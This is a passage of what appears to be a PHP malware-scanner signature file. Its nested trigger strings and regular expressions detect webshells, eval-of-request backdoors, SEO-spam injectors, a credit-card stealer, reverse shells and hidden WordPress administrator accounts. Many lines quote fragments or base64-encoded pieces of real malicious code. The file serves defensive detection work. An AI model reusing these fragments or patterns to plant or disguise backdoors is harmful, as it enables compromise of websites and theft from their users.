		'{die("writing\n");}fwrite($fp,$data);fclose($fp);}function xor_enc' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.117', '\$[\w]+[\s]*=[\s]*[^;]+;[\s]*function readFile[\w]*\(\)[\s]*\{[\s]*\$fname[\s]*=[\s]*__FILE__[^\}]+\}[\s]*\$data[^:\?]+Location:[^;]+;[\s]*header[^;]+;[\s]*die[^\}]+[\s\}]+main[\w]*\(\$[^\)]+\);'),
		'chr(89).chr(109).\'F\'.chr(122).chr(90)."T".chr(89).chr(48)."X".\'2\'.chr(82).chr(108).chr(89)."2"."9"."k".chr(90).chr(81).chr(61).chr(61)' => array(STR_CLEARFILE, 'php.backdoor.system.021', NULL),
	),

	'pass' => array(STR_TRIGGER,

		'stripslashes' => array(STR_TRIGGER,

			'@array_diff_ukey' => array(STR_TRIGGER,
				'@array_diff_ukey' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.generic.050', '@array_diff_ukey\s*\(\s*@array\s*\(\(string\)\$_REQUEST..\w+..\s*=>\s*1\s*\),\s*@array\s*\(\(string\)\s*stripslashes\s*\(base64_decode\s*\(\$_REQUEST\s*..\w+..\)\)\s*=>\s*2\)[^;]+;|if\s*?\(\s*?!empty[^{]+\{\$\w+\s*=\s*@\$_(?:GET|POST|REQUEST|COOKIE)\[.\w+.\]\s*\(..,\s*@\$_(?:GET|POST|REQUEST|COOKIE)\[.\w+.\]\s*\(@\$_(?:GET|POST|REQUEST|COOKIE)\[.\w+.\]\s*\(\s*.\w+.\s*,\s*..,\s*@\$_(?:GET|POST|REQUEST|COOKIE)\[.\w+.\]\)\s*\)\s*\)\s*;\s*\$\w+\s*\(\)\s*;?\s*\}\s*\/\/\s*[^\n]+'),
			),

			'foreach(array("Server Name" => @php_uname(), "System' => array(STR_CLEARFILE, 'php.hacktool.mailer.143', NULL),
		),

		'<th >CC_OWNER' => array(STR_TRIGGER,
			'print_data(base64_decode($maildump))' => array(STR_CLEARFILE, 'php.malware.magento-cc-stealer.045', NULL),
		),

		'echo handleRequest(file_get_contents(\'php://input\'));' => array(STR_CLEARFILE, 'php.backdoor.generic.069', NULL),
		'&name=r0ot.pl' => array(STR_CLEARFILE, 'php.malware.dropper.009', NULL), 
		'$admin[\'pass\']  =  \'' => array(STR_CLEARFILE, 'php.backdoor.filesman.001.001', NULL),
		'$pass = "./pass.txt";' => array(STR_CLEARFILE, 'php.backdoor.filesman.001.002', NULL),
		'return $proxify ? "{$GLOBALS[\'_script_url\']}?' => array(STR_CLEARFILE, 'php.hacktool.php_proxy.004', NULL),
		'DQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw' => array(STR_CLEARFILE,'php.backdoor.symlink-sa.002', NULL),
		'if (fwrite($fp,"$content\n") == FALSE) {exit;}' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.006', NULL),
		'skype:sowakidi' => array(STR_CLEARFILE, 'php.hacktool.phishbackend.003', NULL),
		'create_function("",@gzuncompress($__));$_();' => array(STR_CLEARFILE, 'php.malware.filesman.030', NULL),
		'Q3JlYXRlX0Z1bmN0aW9u");$style=$css(\'\',preg_replace("/#html/","",$html));$style();' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.333', '\$[\w]+[\s]*=[\s]*[^;]+;[\s]*\$html[\s]*[^\n]+\$html\)\);[\s]*\$style\(\);[\s]*(\/\*[^>]+css".>.;\*\/)?'),
		'aW5mby55YWhvby5jb21cXFwvcHJpdmFjeVxcXC91c1xcXC95YWhvb1xcXC9yZWxldmFudGFkcy5odG1s' => array(STR_CLEARFILE, 'php.phishing.aol.002.03', NULL),
	),
	
	'fopen(' => array(STR_TRIGGER,

		'base64_decode(\'dys=\')' => array(STR_TRIGGER,
			'[base64_decode(\'ZG9tYWlu\')' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.crypper.005', '\$[\w]+[\s]*=[\s]*"\/index\/\?[\w]+";[^@]+@fopen\(\$[\w]+,[\s]*base64_decode[^@]+@fopen\(\$[\w]+,[\s]*base64_decode[^>]+return false;[\s]*\}[\s]*((if[\s]*\(!\$_COOKIE\[base64_decode[^\}]+;[\s]*\})|(header\(base64_decode[^;]+\);)|((\/\/)*[\s]*unlink\(\$[\w]+\);[\s]*\$[\w]+[\s]*=[\s]*base64_decode\([^;]+;[\s]*\$[\w]+[\s]*=[\s]*strlen\(\$[\w]+\);[\s]*header\(.Set-Cookie:[^;]+\);[\s]*header\(\$[\w]+\);))'),
		),

		'fwrite($' => array(STR_TRIGGER,

			'echo $' => array(STR_TRIGGER,

				'filesize($' => array(STR_TRIGGER,
					'function[\s]*[\w]+\(\$[\w]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*.[\w]*.;[\s]*if\(file_exists\(\$[\w]+\)\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*fopen\(\$[\w]+,[\s]*.[\w]+.\);[\s]*\$[\w]+[\s]*=[\s]*fread\(\$[\w]+,[\s]*filesize\(\$[\w]+\)\);[\s]*fclose\(\$[\w]+\);' => array(REX_CLEARFILE, 'php.backdoor.filesman.137', NULL),
				),

				'name=cpanelcracking' => array(STR_CLEARFILE, 'php.hacktool.cpanel_bruteforce.014', NULL),
			),

			'PD9waHAgCi8vV2lsbCBjb' => array(STR_CLEARFILE, 'php.backdoor.uploader.346', NULL),
			'if(!@ftp_put($ftpconn, $remoteFile, $file, FTP_BINARY)){' => array(STR_CLEARFILE, 'php.backdoor.webshell.227', NULL),
			'U2hlbGw6PGJyPjxhIGhyZWY9Imh0dHA' => array(STR_CLEARFILE, 'php.backdoor.webshell.232', NULL),
			'=base64_decode(base64_decode($' => array(STR_CLEARFILE, 'php.backdoor.uploader.409', NULL),
			'base64_decode(gzinflate(base64_decode(\'dVXblqI6FPygeeGi08OjcpM4YHMJtzchPaAJyDpq2/D1pwB7dE6fecgihE3tyq7Kzquh3fabVWX4p/dtJW0N' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.injector.136', '\$\w+.=.base64_decode\(gzinflate\(base64_decode\(\'[^;]*;\s+(\$\w+...fopen\(\$_SERVER\[\'DOCUMENT_ROOT\'\]\.\'(\/\w+){1,5}\.php\',.\'w\'\);\s+fwrite\(\$\w+[^;]*;\s+fclose\(\$\w+\);\s+){2}'),
		),

		'PD9waHAgQGV2YWwoJF9QT1NUWy' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.114', '\@fputs\s*\(\s*fopen\s*\(\s*base64_decode\s*\([\'"][^,]+,\s*[waer+]{0,2}\s*\)\s*,\s*base64_decode\([\'"]PD9waHAgQGV2YWwoJF9QT1NUWy[^\']+\'\)\s*\)\s*;'),
	),

	'.base64_decode' => array(STR_TRIGGER,
		'eval("?>".base64_decode("' => array(STR_CLEAR_MULTIMATCH, 'php.malware.generic.002','eval.".."\.base64_decode."[^)]+\)\);?'),
		'eval("".base64_decode(' => array(STR_CLEAR_LINEMATCH, 'php.malware.generic.024', 'eval."".base64_decode[^ ]*;'),
		'eval(\'\'.base64_decode(' => array(STR_CLEAR_LINEMATCH, 'php.malware.generic.025', 'eval....base64_decode[^ ]*;'),
		'$rate_code=base64_decode(\'PGlmcmFtZSBzcmM9Ig==\')' => array(STR_CLEAR_MULTIMATCH, 'php.malware.openx_injection.001', '\$filename=MAX_PATH."[^";]+\.php";\s*if .isset.._COOKIE[^\}]+?apc_delete_file..filename.;[^<>]+?\$rate_code=base64_decode..PGlmcmFtZSBzcmM9Ig==[^<>]+?else\s*{\s*echo \$rate_code;\s*\}\s*\}\s*\}'), 
		'if($line3[0] == \'wpupdatestream\')' => array(STR_CLEARFILE, 'php.backdoor.fake_wpwhitesecurity.001', NULL),
		'isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.045', 'error_reporting\(0\);[\s]*\$[\w]+[\s]*=[\s]*\(isset\(\$_SERVER\[.HTTP_HOST"\]\) \? \$_SERVER\[.HTTP[^>]+\$str\);[\s]*\}'),
		'<?php eval(\'?>\'.base64_decode(\'Cjw/cGhwCiRjaCA9IGN1cmxfaW5pd' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.303', 'eval\(.\?>.[\s]*\.base[^;]+\);'),
	),

	'googlebot|msnbot|yahoo|search|bing|ask|indexer' => array(STR_TRIGGER,

		'decrypt_url' => array(STR_TRIGGER, 
			'$check_data = (\'<!--checker_start \');' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.034.04', 'function my_time\([^\^]+function request_url_data[^#]+\$_pas+word[^\#]+\$buffer\s*=\s*ob_get_clean[^@]+echo\s*\$buffer;\s*ob_flush..;\s*\}\s*function\s*decrypt_url[^\^]+encrypted_url[^#]+\}..iend'),
		),

		'if($cell_guardian->isBot()){$is_bot = 1;}else{$is_bot = 0;}' => array(STR_CLEARFILE, 'php.spam-seo.injector.063', NULL),
		'$check_data = (\'<!--checker_start \');' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.034.02', '(\/\/istart\s+)?function my_time\(.+?\$_passssword.+?ob_flush..;[^\/]+?\}\/\/iend'),
		'echo(\'<!--checker_start' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.034.03', '\/\/istart[^f]+function (is_valid_url|request_url_data)\(.+?\$_passssword.+?print \$decoded;\s*\}\s*\}\s*\/\/iend\w*'), 
	),

	'[\'zym_decrypt\']' => array(STR_CHAIN_TRIGGER,
		'global $zym_decrypt' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.zym_decrypt.001', '<\?php[\s]*global[\s]*\$zym_decrypt;[\s]*\$zym_decrypt[^>]+>'),
		'= decrypt_str ($GLOBALS[\'zym_decrypt\']' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.zym_decrypt.001.03', 'function\s*\w+\(\$\w+[^{]+{[^{]+{\s*\$\w+\s*.=\s*\$\w+\s*\[(\$GLOBALS\[\'zym_decrypt\'\])[^;]+;\s*}[^\@]+\@\1[^\&]+\&\&\s*\1[^\&]+\&\&\s*\1[^}]+}\s*if\s*\(\$[^\?]+\?<[^\!]+\![^\/]+\/content-length[^{]+{[^\*]+\*\)\?\/i[^\!]+\!=+\s*false\s*\&+\s*\1[^\/]+\/href[^\^]+\^"\]\*\?"\/i[^\^]+\^>\]\*\?[^\%]+exit\s*\(\)\s*;\s*}\s*}\s*}'),
		'$GLOBALS[\'zym_decrypt\']' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.zym_decrypt.001.02', '(\$\w+\s*=\s*)?\$GLOBALS\[\'zym_decrypt\'\]\s*\[\'\S+\'\][^{]+{\s*\$\w+\s*=\s*\$GLOBALS\[\'zym_decrypt\'\][^}]+}[^\(]+\(\$\w+[^}]+}\s*else[^}]+}[^\@]+curl_close\s*\(\$\w+\)\s*;\s*}?\s*if\s*\(\s*\$[^}]+}\s*}[^}]+}[^\!]+\!==\s*false[^}]+}\s*return\s*false\s*;\s*}\s*function[^}]+}\s*return\s*false\s*;\s*}'),
	),

	'unlink(MyFileName());' => array(STR_TRIGGER,

		'components' => array(STR_TRIGGER,
			'wp-content' => array(STR_CLEARFILE, 'php.backdoor.uploader.118', NULL),
		),

		'strpos($pDirs[$ind], $ignoreshit)' => array(STR_CLEARFILE, 'php.backdoor.uploader.121', NULL),
	),

	'_\']=Array(base64_decode(\'Z' => array(STR_TRIGGER,

		'Array(\'aHR0' => array(STR_TRIGGER,
			'echo $_' => array(STR_CLEAR_MULTIMATCH, 'php.malware.generic.034.02','\$GLOBALS\[.[\w]+_.\]=Array\(base64_decode[^;]+;[\s]*function[^#]+round\([^}]+\}[\s]*echo \$_[\w]+;'),
		),

		'\']=Array(base64_decode(' => array(STR_CLEAR_LINEMATCH, 'php.malware.generic.034','\$GLOBALS\[.[\w]+_.\]=Array\(base64_decode\(.[^\n]+[;}]'),
	),

	'$raw = base64_decode($encoded);' => array(STR_TRIGGER,
		'$res .= chr(ord($raw[$i]) ^ ord(\'x\'));' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.049', '\\$encoded = \"[^;]+;[\\s]*\\$raw = base64_decode.\\$encoded[^}]+ord[^>]+eval\\(\\$res\\)'),
		'$res = \'\'' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.056', '\$encoded\s*=\s*["\'][^=]+=[\'"];\s*\$raw\s*=\s*base64_decode\(\$encoded\);\s*\$res\s*=\s*\'\';'),
	),

	'$_F=__FILE__;$_X=\'Pz48P3BocA0K' => array(STR_TRIGGER,
		'NoMXJzNXQ' => array(STR_CLEARFILE, 'php.backdoor.webshell.136', NULL),
		'Pz48P3BocA0KLy9Ca3NtNGw1ICoqKFIyMlRUTikqKg0KczV0X3' => array(STR_CLEARFILE, 'php.hacktool.mailer.109', NULL),
	),

	'chmod(' => array(STR_TRIGGER,
		'ExecCGI' => array(STR_TRIGGER,
			'IyEvdXNyL2Jpbi9wZXJs' => array(STR_CLEARFILE, 'php.backdoor.reverseshell.003', NULL),
		),
	),

	'} ^ $' => array(STR_TRIGGER,
		'\'](null, $' => array(STR_TRIGGER,
			'++, $' => array(STR_CLEARFILE, 'php.backdoor.create_function.015', NULL),
		),
	),

	'aWYoJHRtcFsnaG9zdCddKX' => array(STR_TRIGGER,
		'$outputData = create_function(false, $rawData);' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.092', NULL),
	),

	'Z2V0RWxlbWVudEJ5SWQ' => array(STR_TRIGGER,
		'(substr($_SERVER["REQUEST_URI' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.311', 'if[\s]*\(\$_SERVER\[.REQUEST_URI.\][\s]*==[^+]+base64_decode\(.[\S]+==.\);[^;]+endif;'),
	),
	
	'strpos($_SERVER[base64_decode' => array(STR_TRIGGER,
		'd3AtYWRtaW4=' => array(STR_CLEAR_LINEMATCH, 'php.malware.injector.031', 'if\s*\(\s*strpos\(\$_SERVER\[base64_decode..Uk[^>]+base64_decode..d3[^>]+base64_decode.base64_decode[^>]+\)\);\}'),
	),

	'$_image_folder_ = $folder_name.$firstName.$lastName.$folder_escape;' => array(STR_TRIGGER,
		'$featureInfo = $row[\'featureInfo\']." ".base64_decode(' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.041', NULL),
	),

	'echo "#success connection#<' => array(STR_TRIGGER,
		'if (array_key_exists (\'delete\', $_REQUEST)' => array(STR_CLEARFILE, 'php.spam-seo.injector.255', NULL),
	),

	');shuffle($tags);foreach($tags as $tg){if(preg_match(\'!\'.$tg.\'!\', $output)) {$output=preg_replace(' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.e_accelerator.001', '@ini_set\(.display_errors.,[\s]*.0.\);[^}]+function _*e_accelerat(e|or)(_engine_*)?\(\$output\)[\s]*\{[\s]*if[\s]*\([^}]+break;\}}}[\s]*return[^}]+:\(..\)\)\.\$output;\}[\s]*(ob_start\(._*e_accelerat[^;]+;[\s]*register_shutdown_function\([^;]+\);\})?'),
	'$id_url="https://my.mail.ru/".$id_temp2[0]."/".$id_temp[0]."/";' => array(STR_CLEARFILE, 'php.hacktool.mail_ru_parser.001', NULL),
	'$wpplugin_charset = \'Windows-1251' => array(STR_CLEARFILE, 'php.backdoor.filesman.001.013', NULL),
	'case \'create_symlink\':' => array(STR_CLEARFILE, 'php.backdoor.filesman.001.010', NULL),
	'$____=base64_decode(\'eJ' => array(STR_CLEARFILE, 'php.backdoor.filesman.001.009', NULL),
	'/wp-includes/lo.dat' => array(STR_CLEARFILE, 'php.malware.lo-dat.001', NULL),
	'"Can\'t Create DataFN"' => array(STR_CLEARFILE, 'php.malware.datafn.001', NULL),
	'= \'\' . base64_decode(\'PD9waHA=\')' => array(STR_CLEARFILE, 'php.spam-seo.injector.124', NULL),
	'if(strstr(base64_decode($e), "undermomocontrol") !== false)' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.generic.037', '..[\\w]+[\\s]*\\$c=array..;\\$c.1.=chr[^:]+vspider_get[^>]+>20[^>]+.\\$d..f.;[\\s]*}[\\s]*}[\\s]*..[\\w]+'),
	'base64_decode(\'7b10e+M6siD87My38zznP7A1vSt7HBQsOWe' => array(STR_CLEARFILE, 'php.hacktool.ircbot.007', NULL),
	'"JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdE' => array(STR_CLEARFILE, 'pl.hacktool.ircbot.004', NULL),
	'function do_backdoor_wp($domain_path' => array(STR_CLEARFILE, 'php.backdoor.do_backdoor.001', NULL),
	'="base64_decode";return $' => array(STR_CLEARFILE,'php.malware.base64.025', NULL),
	',base64_decode(\'PD9waHAgQGV2YWwoJF9QT1NUWydzZW5zZSddKTs/Pg==' => array(STR_CLEARFILE, 'php.backdoor.backdoor_installer.002', NULL),
	'file_put_contents(@$_SERVER[HTTP_FILENAME],base64_decode(@$_SERVER[' => array(STR_CLEARFILE, 'php.backdoor.uploader.113', NULL),
	'eval(base64_decode("JGFyclswXT0iQ2lSaGRYUm9YM0JoYzN' => array(STR_CLEARFILE, 'php.backdoor.filesman.058', NULL),
	'$compressed=base64_decode($cookieData);' => array(STR_CLEARFILE, 'php.malware.curl.025', NULL),
	'->dispatch(\'GIF89alxWam9FZlRWYvxGc19VZ29Wb\');' => array(STR_CLEARFILE, 'php.backdoor.uploader.246', NULL),
	'QRUO3FGSBtkSFRWTUBjSCRlROJmSzIEajNTTuh1UB' => array(STR_CLEARFILE, 'php.backdoor.webshell.170', NULL),
	'PHRpdGxlPlRyeWFnIEZpbGUgTWFuYWdlcjwvdGl0bGU+' => array(STR_CLEARFILE, 'php.backdoor.filesman.116', NULL),
	');  @include_once $' => array(STR_CLEARFILE, 'php.malware.include.058', NULL),
	');return base64_decode($a[$i]);} ?> <?' => array(STR_CLEARFILE, 'php.spam-seo.injector.035', NULL),
	'$arr = @unserialize(base64_decode($_POST[\'delete_files\']));' => array(STR_CLEARFILE, 'php.spam-seo.injector.047', NULL),
	'=base64_decode(\'YmluZ2JvdA==\');$' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.017', NULL),
	'(s(base64_decode(\'HyqWB2KC' => array(STR_CLEARFILE, 'php.spam-seo.infector.003', NULL),
	'return base64_decode(get_key("evalcode"));' => array(STR_CLEARFILE, 'php.spam-seo.injector.137', NULL),
	'} } else { if(file_exists($home_dir.\'cache/\'.$uric.\'_cache.txt\')) { $code = @file_get' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.014', NULL),
	'ICdodHRwOi8vd3d3LnRyb3R0eXpvbmUuY29tL3dwLWNvbnRlbnQvcGx1Z2lucy' => array(STR_CLEARFILE, 'php.spam-seo.redirect.087', NULL),
	'function enforce_security(){global $wp_list_table;$test=$wp_list_table;$hidearr=array(base64_decode' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.012', NULL),
),

'str' => array(STR_TRIGGER,

	'str_' => array(STR_TRIGGER,
	
		'str_replace' => array(STR_TRIGGER,
	
			'WHERE 1=1 AND {$wpdb->users}.user_login !=' => array(STR_TRIGGER,
		
				'die($insert_user_result->get_error_message());' => array(STR_TRIGGER,
					'echo "Successfully created user with id: {$insert_user_result}";' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.wp_admin_hider.005', 'function [\w]+\(\$user_search\)[\s]*\{[\s]*global \$wpdb;[^<]+function [\w]+\(\)[\s]*\{[\s]*if\(isset\(\$_GET\[.act.\]\)[\s]*&&[\s]*\$_GET\[.act.\][\s]*==[\s]*.insert.\)[\s]*\{[\s]*\$user_info[^<]+add_action\(.admin_init[^;]+\);'),
				),
	
				'$user_search->query_where);' => array(STR_TRIGGER,
					'var x = document.getElementById("user_pass").value;' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.017.02', NULL),
				),
	
				'resu_etaerc_pw\'), array($' => array(STR_CLEAR_MULTIMATCH, 'php.malware.db_injector.003', 'if \(!function_exists\(.wp_search_querys.\)\)[\s]*\{[\s]*if \(get_option..class_version[^}]+add_option\(.class_version[^,]+,[\s]*mt_rand\([^{]+function wp_search_querys\(\$[^}]+query_where = str_replace..WHERE 1=1[^@]+\$host = .http:[^;]+;[\s]*\$[\w] = \$host[\s]*\.[^;]+class_version[^;]+;[\s]*\$headers = @get_headers[^&]+isset\(\$_REQUEST[^}]+\}[\s]*function[^}]+\}[^}]+\}[\s]*add_action\(.[\w]+.,[\s]*.wp_search_querys.\);(?:\s*})?'),
				'wp_set_auth_cookie($user_ids)' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.wp_admin_hider.001', '(if[\s]*\([\s]*isset\(\$_GET[^\)]+[\s\)]+\{[\s]*\$[\w]+[\s]*=[\s]*\$_GET[^\}]+\}[\s]*)+if[\s\(]+isset[\s]*\(\$[\w]+\)[\s]*&&[\s]*is_numeric[^\{]+\{[\s]*\$userdetail[\s]*=[\s]*get_userdata[^\}]+wp_set_auth_cookie\(\$user_ids\);[\s]*do_action[^\}]+;[\s]*\}[\s]*'),
				'$user_search->query_where = str_replace(\'WHERE 1=1\'' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.wp_admin_hider.002', 'add_action\(.pre_user_query.,[\s]*.[\w]+.\);[\s]*function [\w]+user_query\(\$user_search\)[\s]*\{[\s]*global \$current_user;[\s]*(global \$[\w]+;[\s]*\$[\w]+[\s]*=[^;]+;[\s]*)?\$username[\s]*=[^;]+;[^-]+user_search->query_where[^;]+\);[\s\}]+(function hide_user_count\(\)[^\}]+\}[^\?]+<\?php[\s]*\}[\s]*add_action\([^;]+hide_user_count.\);[\s]*|add_filter\(.views_users.,[^;]+\);[\s]*function [\w]+list_table_views[^\*]+\$all_num[^;]+;[\s]*return \$views;[\s]*\})*'),
			),
	
			'.\'));\'); $' => array(STR_TRIGGER,
	
				');} $' => array(STR_CHAIN_TRIGGER,
					
					'@error_reporting(0);' => array(STR_TRIGGER,
						'@ini_set(\'log_errors\',0);' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.infector.002.03', '@error_reporting\(0\);[\s]*(@ini_set[^;]+;[\s]*)+'),
					),
	
					');} $' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.infector.002', '[\\s]*function[\\s]*[\\w]+\\(\\$[\\w]+[\\s]*,[\\s]*\\$[\\w]+[\\s]*,[\\s]*\\$[\\w]+[\\s]*\\)[\\s]*\\{[\\s]*return[\\s]*str_replace[^>]+ZXZ[^;]+\'\\);'), //ORDER MATTERS WITH php.spam-seo.infector.002.02
				),
				
				'\',\'\',$' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.infector.002.02', '[\\s]*\\$[\\w]+ = \'[\\w]+\';[\\s]*\\$[\\w]+ = str_replace\\(\'[\\w]+\',\'\',\\$[\\w]+\\);[\\s]*\\$[\\w]+ = \'[\\w]+\';[\\s]*\\$[\\w]+ = str_replace\\(\'[\\w]+\',\'\',\\$[\\w]+\\);[\\s]*[^;]+;[^;]+;[^)]+\\)\\);\'\\);[\\s]*\\$[\\w]+\\(\'ZXZ[^;]+\'\\);'), ////ORDER MATTERS WITH php.spam-seo.infector.002 - complex because of regex optimization
			),
	
			'abs(crc32($_SERVER[\'REQUEST_URI\']));' => array(STR_CHAIN_TRIGGER,
				'if(preg_match_all(\'!{([^}]+)}!\',' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.245', '(function [\w]+[\s]*\(\$[\w]\)[\s]*\{[\s]*if\(preg_match_all\(.!\{\(\[\^\}\]\+\)\}\!.,[^\{]+\{[\s]*\$[\w]+[\s]*=[\s]*abs\(crc32\(\$_SERVER\[.REQUEST_URI[^\}]+[\s\}]+return[\s]*\$[\w];[\s]*\}[\s]*function load_extra_modules\(\)[\s]*\{[\s]*(#?\$[\w]+\[\][\s]*=[^\$]+;[\s]*)?\$[\w]+[\s]*=[\s]*mt_rand[^\}]+\}[\s]*\*[\s]*\{[^;]+;[^\?]+";[\s]*\})'),
				'php /*' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.245.02', '<\?php \/\*[\s]*[\w]{20,}[\s]*\*\/[\s]*\?>'),
				'load_extra_modules()' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.245.03', 'load_extra_modules\(\)[\s]*'),
			),
	
			'= \'b' => array(STR_TRIGGER,
				'\' . \'' => array(STR_TRIGGER,
					'unset($' => array(STR_TRIGGER,
						'error_reporting(0);' => array(STR_TRIGGER,
							'isset($_GET[' => array(STR_TRIGGER,
								'@eval($' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_gen.009', 'error_reporting.0.;[\s]*\$[\w]+ = .b[asedco\d\(\)\s\.\'\*_]+;[\s]*\$[\w]+ = isset\(\$_GET[^>]+@eval\(\$[^;]+;[\s]*unset[^;]+;'),
							),
						),
					),
				),
			),
		
			'$prepare' => array(STR_TRIGGER,
				'strrev(' => array(STR_TRIGGER,
					'kses_' => array(STR_CLEARFILE, 'php.backdoor.create_function.016', NULL), //ex php.backdoor.wpautop_pre_term_name.001 - renamed by PG to be more accurate since a .02 variant was found unrelated to that name
				),
			),
		
		
			'function curlRequest($url)' => array(STR_TRIGGER,
				'require_once(\'url_slug.php\');' => array(STR_TRIGGER,
					'<?php include(\'siteconfig.php\');' => array(STR_CLEARFILE, 'php.spam-seo.backlinks.003', NULL),
				),
			),
		
			'base64_decode($' => array(STR_TRIGGER,
				'location' => array(STR_TRIGGER,
					'function[\s]*[\w]+\(\)[\s]*\{[\s]*var[\s]*[\w]+[\s]*=[\s]*.location.;[\s]*var[\s]*[\w]+[\s]*=[\s]*.?document.?;[\s]*[\w]+\[[\w]+\][\s]*=[\s]*.<\?=[\s]*\$[\w]+[\s]*\?>.;[\s]*return[\s]*.[\w]+.;[\s]*\}' => array(REX_CLEARFILE, 'php.malware.redirect.028', NULL),
				),
			),

			'@header(\'HTTP/1.1 200 OK\');' => array(STR_TRIGGER,
				';$ltime = gmdate(\'Y-m-d\TH:i:s+00:00\', strtotime($ltime)); echo $ltime;' => array(STR_TRIGGER,
					'$myposts = get_posts( "numberposts=" . $posts_to_show );' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.003.04', NULL),
				),
			),
	
			'=str_replace("|","",$' => array(STR_TRIGGER,
				'@eval(base64_decode($' => array(STR_CLEARFILE, 'php.spam-seo.injector.211', NULL),
			),
	
			'$content=gethttpcnt($website.$otherstring);' => array(STR_TRIGGER,
				'$content=str_replace("\"images/","\"" . $website . "/images/",$content);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.098', 'function gethttpcnt..url..username = [^}]+curl_close..ch.;[\\s]*return \\$cnt;[\\s]*}[\\s]*\\$website=[^;]+;[\\s]*\\$otherstring=substr.stripslashes[^}]+echo \\$content;'),
			),
	
			'/e",$_GET[' => array(STR_TRIGGER,
				'=eval($_POST[' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.060', NULL),
			),
		
			'unlink(str_replace("".$' => array(STR_TRIGGER,
				'else { $result = "SUCCESS IN";' => array(STR_CLEARFILE, 'php.backdoor.uploader.103', NULL),
			),
		
			'eval(' => array(STR_TRIGGER,
				'(\$\w+)\s*=\s*[\'"][^;]+;\s*(\$\w+)\s*=\s*[\'"][^;]+;\s*(\$\w+)\s*=\s*[\'"][^;]+;\s*(\$\w+)\s*=\s*[\'"][^;]+;\s*(\$\w+)\s*=\s*[\'"]str_replace[\'"]\s*;\s*(\$\w+)\s*=\s*[\'"]{1}[\s\w]{13,23}[\'"]\s*;\s*(\$\w+)\s*=\s*\5\(.\w+.\s*,\s*[\'"]{2}\s*,\s*\6\s*\)\s*;\s*eval\(\6\(\5\(.\w+.\s*,\s*[\'"]{2}\s*,\s*\2\.\3\.\4\.\1\)\)\)\s*;' => array(REX_CLEAR_MULTIMATCH, 'php.malware.base64.039', '(\$\w+)\s*=\s*[\'"][^;]+;\s*(\$\w+)\s*=\s*[\'"][^;]+;\s*(\$\w+)\s*=\s*[\'"][^;]+;\s*(\$\w+)\s*=\s*[\'"][^;]+;\s*(\$\w+)\s*=\s*[\'"]str_replace[\'"]\s*;\s*(\$\w+)\s*=\s*[\'"]{1}[\s\w]{13,23}[\'"]\s*;\s*(\$\w+)\s*=\s*\5\(.\w+.\s*,\s*[\'"]{2}\s*,\s*\6\s*\)\s*;\s*eval\(\6\(\5\(.\w+.\s*,\s*[\'"]{2}\s*,\s*\2\.\3\.\4\.\1\)\)\)\s*;'),
				'= "?>$' => array(STR_CLEARFILE, 'php.backdoor.filesman.135', NULL),
			),
		
			'function ing($string, $key)' => array(STR_TRIGGER,
				'chr(hexdec($func_string' => array(STR_CLEARFILE, 'php.malware.dropper.030', NULL),
			),
		
			'(strpos($sec,"google")):' => array(STR_TRIGGER,
				'PGZvbnQgc3R5bGU9Im92ZXJmbG93OiBhdXRvOyBwb3NpdGlvbjogYWJzb2x1dGU7IGhl' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.277', 'add_action\([\s]*.init.,[\s]*function[^\{]+\{[\s]*\$username[^\}]+set_role\([\s]*.administrator[^\}]+\}[\s]*\}[\s]*\);[\s]*function[\s]*[\w]+\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*\$_SERVER\[.HTTP_USER_AGENT.\];[\s]*\$sec[\s]*=[^\}]+\}[\s]*if\([^\}]+\}[\s]*\}[\s]*add_action\(.[^\)]+\);'),
			),

			'$search, $replace,' => array(STR_TRIGGER,
				'class icit_srdb' => array(STR_CLEARFILE, 'php.hacktool.dbshell.002', NULL),
			),

